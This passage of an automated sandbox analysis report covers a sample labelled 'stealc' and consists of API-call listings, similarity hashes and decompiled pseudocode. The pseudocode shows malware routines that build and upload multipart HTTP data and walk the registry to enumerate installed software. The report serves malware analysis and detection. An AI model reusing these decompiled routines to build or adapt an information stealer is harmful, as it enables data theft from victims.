              • memset.MSVCRT ref: 0017AEF6
              • lstrcat.KERNEL32(?,00000000), ref: 0017AF15
              • lstrcat.KERNEL32(?), ref: 0017AF30
              • lstrcat.KERNEL32(?,?), ref: 0017AF44
              • lstrcat.KERNEL32(?), ref: 0017AF57
                • Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6
                • Part of subcall function 00174D0F: memcmp.MSVCRT ref: 00174DC5
                • Part of subcall function 00174B85: CloseHandle.KERNEL32(00177CCB,?,?,?,00177CCB,?), ref: 00174C0D
                • Part of subcall function 00174C21: CryptStringToBinaryA.CRYPT32(00173628,00000000,00000001,00000000,?,00000000,00000000), ref: 00174C39
                • Part of subcall function 00174C21: CryptStringToBinaryA.CRYPT32(00173628,00000000,00000001,00000000,?,00000000,00000000), ref: 00174C5D
                • Part of subcall function 00174E50: memcmp.MSVCRT ref: 00174E6E
                • Part of subcall function 00174E50: memset.MSVCRT ref: 00174EA0
              • lstrcat.KERNEL32(?,00000000), ref: 0017B040
              • lstrcat.KERNEL32(0017B1B9,?), ref: 0017B073
              • lstrcat.KERNEL32(0017B1B9,00181EBC), ref: 0017B081
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$memset$BinaryCryptStringmemcmp$CloseHandlelstrcpy
              • String ID:
              • API String ID: 2430198047-0
              • Opcode ID: 5ee5a8d2b9800693eb7aeddb81216673f18746498a67a9bdd48fb060e2bbb125
              • Instruction ID: 6d11127c0f1f22936aef080a3f43d60ec0afe91f316e732eac9a8fb89cb05220
              • Opcode Fuzzy Hash: 5ee5a8d2b9800693eb7aeddb81216673f18746498a67a9bdd48fb060e2bbb125
              • Instruction Fuzzy Hash: 0C51F9B6D0021DABCF11EBA4DC45ADEBBB9FF48304F1444A5E909A3261EB319B548F51
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat
              • String ID: %s\%s$%s\*
              • API String ID: 4038537762-2848263008
              • Opcode ID: c9acbf3e54fa8cd65a8b3c423b2d5367f68d1b254fa9e1dcaee3ab3e032a081c
              • Instruction ID: 9c2e76a3fd5f4125bd6bba702dc7f29b3eddae4c3edcc3b1bb4de6ba4f1449d2
              • Opcode Fuzzy Hash: c9acbf3e54fa8cd65a8b3c423b2d5367f68d1b254fa9e1dcaee3ab3e032a081c
              • Instruction Fuzzy Hash: 4651F9B290421DABCF11AFA4DD89ADA7B7CFF04700F4444A5B909E2250EB35DB59CF91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • lstrcat.KERNEL32(?), ref: 0017AC21
              • lstrcat.KERNEL32(?), ref: 0017AC34
              • lstrcat.KERNEL32(?,?), ref: 0017AC48
              • lstrcat.KERNEL32(?,0017AE1B), ref: 0017AC58
              • lstrcat.KERNEL32(?,0017FBDC), ref: 0017AC6A
              • lstrcat.KERNEL32(?,?), ref: 0017AC7E
                • Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6
                • Part of subcall function 00174B85: CloseHandle.KERNEL32(00177CCB,?,?,?,00177CCB,?), ref: 00174C0D
                • Part of subcall function 00173786: lstrlen.KERNEL32(?), ref: 001737DF
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$CloseHandlelstrcpylstrlen
              • String ID: %s\%s
              • API String ID: 460287509-4073750446
              • Opcode ID: 8842c33391683092347dcee469b460c1c21cec476e97a25bdf3d35227b6d47c4
              • Instruction ID: d6fdc401c71f71d3a5b2fd7c56e1053aab6f69d527695a57bb8f55ad5c585d8b
              • Opcode Fuzzy Hash: 8842c33391683092347dcee469b460c1c21cec476e97a25bdf3d35227b6d47c4
              • Instruction Fuzzy Hash: 4B510BB190021DABCF51DBA4CC88ADE7BBCFF48710F4444A5A609E3250EB349B99CF51
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 46%
              			E0017B2B5(void* __eflags, char _a4) {
              				void* _v8;
              				char _v20;
              				char _v284;
              				char _v548;
              				char _v812;
              				char _v1076;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t64;
              				void* _t84;
              				void* _t110;
              				void* _t138;
              				void* _t143;
              				void* _t144;
              				void* _t149;
              				void* _t150;
              
              				_t150 = __eflags;
              				_v8 =  &_v284;
              				memset(_v8, 0, 0x104 << 0);
              				_v8 =  &_v1076;
              				memset(_v8, 0, 0x104 << 0);
              				_v8 =  &_v548;
              				memset(_v8, 0, 0x104 << 0);
              				_v8 =  &_v812;
              				memset(_v8, 0, 0x104 << 0);
              				 *0x383730( &_v1076,  *0x383248);
              				_t64 = E0017D8C9( &_v20, 0x1a);
              				_pop(_t110);
              				 *0x383730( &_v284,  *_t64);
              				E00171839(_v20);
              				 *0x383730( &_v284,  &_v1076);
              				 *0x383730( &_v548,  &_v284);
              				 *0x383730( &_v548,  *0x3831c8);
              				 *0x383730( &_v812,  &_v284);
              				 *0x383730( *0x383208);
              				_t143 = _t138 + 0x30 - 0xc;
              				E0017E990(_t143, _t150,  &_v548);
              				_t84 = E0017D89F( &_v812);
              				_t144 = _t143 + 0xc;
              				if(_t84 != 0) {
              					_t149 = _t144 - 0x50;
              					E001716CB( &_a4, _t149);
              					_push( &_v812);
              					E0017B0EF(_t110);
              					_t144 = _t149 + 0x54;
              				}
              				_v8 =  &_v284;
              				memset(_v8, 0, 0x104 << 0);
              				_v8 =  &_v1076;
              				memset(_v8, 0, 0x104 << 0);
              				_v8 =  &_v548;
              				memset(_v8, 0, 0x104 << 0);
              				_v8 =  &_v812;
              				memset(_v8, 0, 0x104 << 0);
              				return E001716AC( &_a4);
              			}




















              0x0017b2b5
              0x0017b2c7
              0x0017b2d4
              0x0017b2dc
              0x0017b2e9
              0x0017b2f1
              0x0017b2fe
              0x0017b306
              0x0017b313
              0x0017b322
              0x0017b32d
              0x0017b332
              0x0017b33c
              0x0017b345
              0x0017b358
              0x0017b36c
              0x0017b37f
              0x0017b393
              0x0017b3a6
              0x0017b3ac
              0x0017b3b8
              0x0017b3bd
              0x0017b3c2
              0x0017b3c7
              0x0017b3c9
              0x0017b3d1
              0x0017b3dc
              0x0017b3dd
              0x0017b3e2
              0x0017b3e2
              0x0017b3eb
              0x0017b3f8
              0x0017b400
              0x0017b40d
              0x0017b415
              0x0017b422
              0x0017b42a
              0x0017b437
              0x0017b445

              APIs
              • lstrcat.KERNEL32(?), ref: 0017B322
              • lstrcat.KERNEL32(?,00000000), ref: 0017B33C
              • lstrcat.KERNEL32(?,?), ref: 0017B358
              • lstrcat.KERNEL32(?,?), ref: 0017B36C
              • lstrcat.KERNEL32(?), ref: 0017B37F
              • lstrcat.KERNEL32(?,?), ref: 0017B393
              • lstrcat.KERNEL32(?), ref: 0017B3A6
                • Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6
                • Part of subcall function 0017B0EF: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 0017B102
                • Part of subcall function 0017B0EF: RtlAllocateHeap.NTDLL(00000000), ref: 0017B109
                • Part of subcall function 0017B0EF: lstrcat.KERNEL32(?), ref: 0017B207
                • Part of subcall function 0017B0EF: lstrcat.KERNEL32(?), ref: 0017B21A
                • Part of subcall function 0017B0EF: lstrlen.KERNEL32(0017B3E2), ref: 0017B223
                • Part of subcall function 0017B0EF: lstrlen.KERNEL32(0017B3E2), ref: 0017B230
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpy
              • String ID:
              • API String ID: 3953687974-0
              • Opcode ID: 668e86b2b743a1fddc3b89373594ef306fa6556019a3b5e30657d881a72425f5
              • Instruction ID: 8ae2f0348cee3a8c0c2c19288a0f263d131ae6a686bf79e872790b1afe17083b
              • Opcode Fuzzy Hash: 668e86b2b743a1fddc3b89373594ef306fa6556019a3b5e30657d881a72425f5
              • Instruction Fuzzy Hash: 8D41E6B291021CABCB51DBA4D999ADDB7FDFB48310F5444E5E609E3250EB30AF859F40
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,0017FBD9), ref: 0017D155
              • RtlAllocateHeap.NTDLL(00000000), ref: 0017D15C
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: Heap$AllocateProcess
              • String ID: :\$C$QuBi
              • API String ID: 1357844191-239756005
              • Opcode ID: 120bbbd10ede9a0dee49cb47d196aa686d9d7b49fe9923555114b8b3c06cd587
              • Instruction ID: ceeaaaa66157e99d66d265a645ec920c8ad1af6a6b26fd709883e438b5b70380
              • Opcode Fuzzy Hash: 120bbbd10ede9a0dee49cb47d196aa686d9d7b49fe9923555114b8b3c06cd587
              • Instruction Fuzzy Hash: 9D2162B2A0420DBEDB119FB89E859AEBEBCEF5D744F4041A9F145E2211E334CB418761
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: ExitProcessstrtok_s
              • String ID: block
              • API String ID: 3407564107-2199623458
              • Opcode ID: 14ecf174fe190994b2502b8f3a308079cbf9598caeaccd5c39132efff469d560
              • Instruction ID: 4aeaf86d33ab1e0bdf31db73225497ffc10fa7b08919a6a3ed636cb67b77445a
              • Opcode Fuzzy Hash: 14ecf174fe190994b2502b8f3a308079cbf9598caeaccd5c39132efff469d560
              • Instruction Fuzzy Hash: BC311AB1648204BBDB64BFA1DD48E5A7BBCEF80745F108099FC09DA156E778C6888B51
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00173170(void* __ecx, void* __eflags, intOrPtr* _a4, char _a8, char _a20, char _a32) {
              				char _v16;
              				char _v28;
              				signed int _v32;
              				void* _v36;
              				char _v40;
              				char _v44;
              				char _v56;
              				char _v68;
              				intOrPtr _v72;
              				char _v84;
              				char _v96;
              				char _v108;
              				char _v120;
              				intOrPtr _v136;
              				intOrPtr _v156;
              				intOrPtr _v164;
              				intOrPtr _v176;
              				void _v180;
              				char _v240;
              				char _v2240;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t174;
              				intOrPtr _t181;
              				void* _t185;
              				void* _t213;
              				void* _t254;
              				signed int _t259;
              				void* _t346;
              				signed int _t351;
              				signed int _t363;
              				signed int _t365;
              				void* _t367;
              				void* _t454;
              				void* _t455;
              
              				_t461 = __eflags;
              				E0017E9C2( &_a8, __ecx, _t455 - 0xc, __eflags);
              				_t174 = E001730F8();
              				_t365 = 0xf;
              				memcpy( &_v180, _t174, _t365 << 2);
              				E0017E990(_a4, _t461, 0x17fbd9);
              				E0017E990( &_v96, _t461, 0x17fbd9);
              				E0017E990( &_v16, _t461, 0x17fbd9);
              				E0017E990( &_v68, _t461, 0x17fbd9);
              				E0017E990( &_v108, _t461, 0x17fbd9);
              				_t181 =  *0x383694(0, 1, 0, 0, 0,  &_v240);
              				_push( *0x3833a4);
              				_v72 = _t181;
              				_push(_v176);
              				_v32 = 0;
              				if( *0x383754() == 0) {
              					_v32 = 1;
              				}
              				_t463 = _v72;
              				if(_v72 != 0) {
              					_t213 = E0017D78F(0x17fbd9,  &_v56, _t463, 0x14);
              					_pop(0);
              					E0017EA2F(E0017EA69( &_v96, 0, _t213,  &_v84, _t463), 0,  &_v96);
              					E00171839(_v84);
              					E00171839(_v56);
              					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t463, "\r\n"), 0,  &_v68);
              					E00171839(_v56);
              					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t463, "------"), 0,  &_v68);
              					E00171839(_v56);
              					E0017EA2F(E0017EA69( &_v68, 0,  &_v96,  &_v56, _t463), 0,  &_v68);
              					E00171839(_v56);
              					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t463, "--"), 0,  &_v68);
              					E00171839(_v56);
              					E0017EA2F(E0017EAAB( &_v68, 0,  &_v56, _t463, "\r\n"), 0,  &_v68);
              					E00171839(_v56);
              					E0017EA2F(E0017EA69(E0017EAAB( &_v108, 0,  &_v28, _t463,  *0x38306c), 0,  &_v96,  &_v84, _t463), 0,  &_v108);
              					E00171839(_v84);
              					E00171839(_v28);
              					_t254 =  *0x383778(_v72, _v164, _v156, 0, 0, 3, 0, 0);
              					_v36 = _t254;
              					if(_t254 != 0) {
              						asm("sbb eax, eax");
              						_t259 =  *0x3837a8(_v36,  *0x3833c0, _v136,  *0x3831f8, 0, 0, ( ~_v32 & 0x00800000) + 0x400100, 0);
              						_v32 = _t259;
              						_t465 = _t259;
              						if(_t259 != 0) {
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "------"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, 0,  &_v96,  &_v28, _t465), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v56, _t465,  *0x38322c), 0,  &_v16);
              							E00171839(_v56);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465,  *0x383380), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "\"\r\n\r\n"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, 0,  &_a20,  &_v28, _t465), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "------"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, 0,  &_v96,  &_v28, _t465), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v56, _t465,  *0x38322c), 0,  &_v16);
              							E00171839(_v56);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465,  *0x383428), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EAAB( &_v16, 0,  &_v28, _t465, "\"\r\n\r\n"), 0,  &_v16);
              							E00171839(_v28);
              							E0017EA2F(E0017EA69( &_v16, 0,  &_a32,  &_v28, _t465), 0,  &_v16);
              							E00171839(_v28);
              							E0017E990( &_v84, _t465, 0x17fbd9);
              							E0017EA2F(E0017EA69(E0017EA69( &_v84, 0,  &_v16,  &_v56, _t465), 0,  &_v68,  &_v28, _t465), 0,  &_v84);
              							E00171839(_v28);
              							E00171839(_v56);
              							_t346 =  *0x383658(_v108, _v84,  *0x383658(_v84));
              							_t363 = _v32;
              							 *0x383748(_t363, _v108, _t346);
              							while(1) {
              								_push( &_v32);
              								_push(0x7cf);
              								_push( &_v2240);
              								_push(_t363);
              								if( *0x3836b8() == 0) {
              									break;
              								}
              								_t351 = _v32;
              								__eflags = _t351;
              								if(__eflags != 0) {
              									 *((char*)(_t454 + _t351 - 0x8bc)) = 0;
              									E0017EA2F(E0017EAAB(_a4, 0,  &_v120, __eflags,  &_v2240), 0, _a4);
              									E00171839(_v120);
              									continue;
              								}
              								break;
              							}
              							 *0x383690(_t363);
              							E00171839(_v84);
              						}
              						 *0x383690(_v36);
              					}
              				}
              				 *0x383690(_v72);
              				_t185 = E00174C21( &_v40, 0,  &_v44,  *_a4);
              				_pop(_t367);
              				_t467 = _t185;
              				if(_t185 != 0) {
              					E0017E9EB(_t367, _a4, 0x17fbd9);
              					E0017EA2F(E0017EAAB(_a4, _t367,  &_v120, _t467, _v40), _t367, _a4);
              					E00171839(_v120);
              				}
              				_v36 =  &_v40;
              				memset(_v36, 0, 4 << 0);
              				_v36 =  &_v44;
              				memset(_v36, 0, 4 << 0);
              				E00171839(_v108);
              				E00171839(_v68);
              				E00171839(_v16);
              				E00171839(_v96);
              				E00171839(_a8);
              				E00171839(_a20);
              				E00171839(_a32);
              				return _a4;
              			}







































              0x00173170
              0x00173184
              0x00173190
              0x0017319a
              0x001731a3
              0x001731ae
              0x001731b7
              0x001731c0
              0x001731c9
              0x001731d2
              0x001731e1
              0x001731e7
              0x001731ed
              0x001731f0
              0x001731f6
              0x00173201
              0x00173203
              0x00173203
              0x00173206
              0x00173209
              0x00173214
              0x0017321b
              0x0017322a
              0x00173232
              0x0017323a
              0x00173252
              0x0017325a
              0x00173272
              0x0017327a
              0x00173290
              0x00173298
              0x001732b0
              0x001732b8
              0x001732d0
              0x001732d8
              0x001732f9
              0x00173301
              0x00173309
              0x00173325
              0x0017332b
              0x00173330
              0x0017333c
              0x00173360
              0x00173366
              0x00173369
              0x0017336b
              0x00173384
              0x0017338c
              0x0017339f
              0x001733a7
              0x001733bf
              0x001733c7
              0x001733e0
              0x001733e8
              0x00173401
              0x00173409
              0x00173421
              0x00173429
              0x0017343f
              0x00173447
              0x0017345f
              0x00173467
              0x0017347f
              0x00173487
              0x0017349d
              0x001734a5
              0x001734bd
              0x001734c5
              0x001734de
              0x001734e6
              0x001734ff
              0x00173507
              0x0017351f
              0x00173527
              0x0017353d
              0x00173545
              0x0017354e
              0x0017356f
              0x00173577
              0x0017357f
              0x00173594
              0x0017359a
              0x001735a2
              0x001735e0
              0x001735e3
              0x001735e4
              0x001735eb
              0x001735ec
              0x001735f5
              0x00000000
              0x00000000
              0x001735af
              0x001735b2
              0x001735b4
              0x001735b6
              0x001735d3
              0x001735db
              0x00000000
              0x001735db
              0x00000000
              0x001735b4
              0x001735f8
              0x00173601
              0x00173601
              0x00173609
              0x00173609
              0x00173330
              0x00173612
              0x00173623
              0x00173628
              0x00173629
              0x0017362b
              0x00173635
              0x0017364b
              0x00173653
              0x00173653
              0x0017365b
              0x00173668
              0x0017366d
              0x0017367a
              0x0017367f
              0x00173687
              0x0017368f
              0x00173697
              0x0017369f
              0x001736a7
              0x001736af
              0x001736bb

              APIs
                • Part of subcall function 0017E9C2: lstrcpy.KERNEL32(00000000,?), ref: 0017E9E1
                • Part of subcall function 001730F8: malloc.MSVCRT ref: 0017312A
                • Part of subcall function 001730F8: malloc.MSVCRT ref: 00173130
                • Part of subcall function 001730F8: malloc.MSVCRT ref: 00173136
                • Part of subcall function 001730F8: lstrlen.KERNEL32(000000FF,00000000,?), ref: 00173148
                • Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6
                • Part of subcall function 0017EAAB: lstrlen.KERNEL32(?,?,?,0017D009,00181EC0,00000000,00181EC0,00000000,0017FBD9), ref: 0017EABF
                • Part of subcall function 0017EAAB: lstrcpy.KERNEL32(00000000,?), ref: 0017EAE7
                • Part of subcall function 0017EAAB: lstrcat.KERNEL32(?,00000000), ref: 0017EAF2
                • Part of subcall function 0017EA2F: lstrcpy.KERNEL32(00000000,?), ref: 0017EA5F
                • Part of subcall function 0017EA69: lstrcpy.KERNEL32(00000000,?), ref: 0017EA97
                • Part of subcall function 0017EA69: lstrcat.KERNEL32(?,00000000), ref: 0017EAA1
              • lstrlen.KERNEL32(?,0017FBD9,",00181E44,------,00181E44,",00181E44,------), ref: 00173587
              • lstrlen.KERNEL32(?,?,00000000), ref: 00173594
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcpy$lstrlen$malloc$lstrcat
              • String ID: "$------
              • API String ID: 2687269759-2370822465
              • Opcode ID: b659c0465ccd96a1476ecdd27c327f15bfec3e4a4f2d1f799653175fd554cbf5
              • Instruction ID: ba591fb590214283e3ffd506b8f5685a45c140b0315076123e67b2db4a7ece25
              • Opcode Fuzzy Hash: b659c0465ccd96a1476ecdd27c327f15bfec3e4a4f2d1f799653175fd554cbf5
              • Instruction Fuzzy Hash: 42F17436D0012AABCF01FFA4EC429DDBBB9BF58704F5590A1B91877161DB306F5A8B90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 53%
              			E0017D460(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
              				char _v8;
              				char _v12;
              				char _v24;
              				char _v28;
              				char _v32;
              				char _v36;
              				intOrPtr _v40;
              				char _v52;
              				char _v64;
              				char _v76;
              				char _v88;
              				char _v1112;
              				char _v2136;
              				char _v3160;
              				void* __esi;
              				void* _t62;
              				intOrPtr _t65;
              				intOrPtr _t82;
              				void* _t119;
              				intOrPtr _t122;
              				void* _t131;
              
              				_t121 =  &_v24;
              				E0017E990( &_v24, __eflags, 0x17fbd9);
              				_v28 = 0;
              				_v12 = 0;
              				_v36 = 0xf003f;
              				_v8 = 0;
              				_t62 =  *0x383684(_a8,  *0x383458, 0, 0x20019,  &_v28);
              				_t133 = _t62;
              				if(_t62 == 0) {
              					_v32 = 0;
              					do {
              						_v8 = 0x400;
              						_t65 =  *0x383770(_v28, _v32,  &_v2136,  &_v8, 0, 0, 0, 0);
              						_v40 = _t65;
              						__eflags = _t65;
              						if(_t65 != 0) {
              							goto L10;
              						}
              						 *0x3835d0( &_v3160, "%s\\%s",  *0x383458,  &_v2136);
              						_t131 = _t131 + 0x10;
              						__eflags =  *0x383684(_a8,  &_v3160, 0, 0x20019,  &_v12);
              						if(__eflags != 0) {
              							 *0x3836f0(_v12);
              							L13:
              							 *0x3836f0(_v28);
              							_t122 = _a4;
              							E0017E9C2( &_v24, _t119, _t122, __eflags);
              							E00171839(_v24);
              							goto L14;
              						}
              						_v8 = 0x400;
              						_t82 =  *0x38366c(_v12,  *0x3834cc, 0,  &_v36,  &_v1112,  &_v8);
              						__eflags = _t82;
              						if(_t82 == 0) {
              							__eflags =  *0x383658( &_v1112) - 1;
              							if(__eflags > 0) {
              								E0017EA2F(E0017EAAB( &_v24, _t119,  &_v88, __eflags, "\n\t"), _t119,  &_v24);
              								E00171839(_v88);
              								E0017EA2F(E0017EAAB( &_v24, _t119,  &_v52, __eflags,  &_v1112), _t119,  &_v24);
              								E00171839(_v52);
              								_v8 = 0x400;
              								__eflags =  *0x38366c(_v12,  *0x383300, 0,  &_v36,  &_v1112,  &_v8);
              								if(__eflags == 0) {
              									E0017EA2F(E0017EAAB( &_v24, _t119,  &_v76, __eflags, " - "), _t119,  &_v24);
              									E00171839(_v76);
              									E0017EA2F(E0017EAAB( &_v24, _t119,  &_v64, __eflags,  &_v1112), _t119,  &_v24);
              									E00171839(_v64);
              								}
              							}
              						}
              						 *0x3836f0(_v12);
              						L10:
              						_v32 = _v32 + 1;
              						__eflags = _v40;
              					} while (__eflags == 0);
              					goto L13;
              				} else {
              					_t122 = _a4;
              					E0017E9C2(_t121, _t119, _t122, _t133);
              					E00171839(_v24);
              					L14:
              					return _t122;
              				}
              			}
























              0x0017d470
              0x0017d473
              0x0017d48a
              0x0017d490
              0x0017d493
              0x0017d49a
              0x0017d49d
              0x0017d4a3
              0x0017d4a5
              0x0017d4bf
              0x0017d4c7
              0x0017d4d9
              0x0017d4df
              0x0017d4e5
              0x0017d4e8
              0x0017d4ea
              0x00000000
              0x00000000
              0x0017d509
              0x0017d50f
              0x0017d52c
              0x0017d52e
              0x0017d638
              0x0017d63e
              0x0017d641
              0x0017d647
              0x0017d64d
              0x0017d655
              0x00000000
              0x0017d65a
              0x0017d54a
              0x0017d550
              0x0017d556
              0x0017d558
              0x0017d56b
              0x0017d56e
              0x0017d587
              0x0017d58f
              0x0017d5a9
              0x0017d5b1
              0x0017d5cc
              0x0017d5d8
              0x0017d5da
              0x0017d5ef
              0x0017d5f7
              0x0017d611
              0x0017d619
              0x0017d619
              0x0017d5da
              0x0017d56e
              0x0017d621
              0x0017d627
              0x0017d627
              0x0017d62a
              0x0017d62a
              0x00000000
              0x0017d4a7
              0x0017d4a9
              0x0017d4ac
              0x0017d4b4
              0x0017d65c
              0x0017d660
              0x0017d660

              APIs
                • Part of subcall function 0017E990: lstrcpy.KERNEL32(00000000,00000000), ref: 0017E9B6
              • lstrlen.KERNEL32(?), ref: 0017D565
                • Part of subcall function 0017E9C2: lstrcpy.KERNEL32(00000000,?), ref: 0017E9E1
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.284082121.0000000000171000.00000080.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
              • Associated: 00000002.00000002.284077198.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284101447.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284113807.0000000000383000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000002.00000002.284132410.0000000000395000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_170000_stealc.jbxd
              Yara matches
              Similarity
              • API ID: lstrcpy$lstrlen
              • String ID: - $%s\%s$?
              • API String ID: 367037083-3278919252
              • Opcode ID: 08a63f7a051e61aab646d423481b2f9aa3af428de69cf108ace6d5db8b746a67
              • Instruction ID: 922f5bbec7358da8df8b4d4e066bcf30c50914741db0ed238e4e458be2cbcad8
              • Opcode Fuzzy Hash: 08a63f7a051e61aab646d423481b2f9aa3af428de69cf108ace6d5db8b746a67
              • Instruction Fuzzy Hash: C951A27590021DABCF11EF94DD458EEBBBCEF58705F1080A6A609B3261DB30AF498B60
              Uniqueness

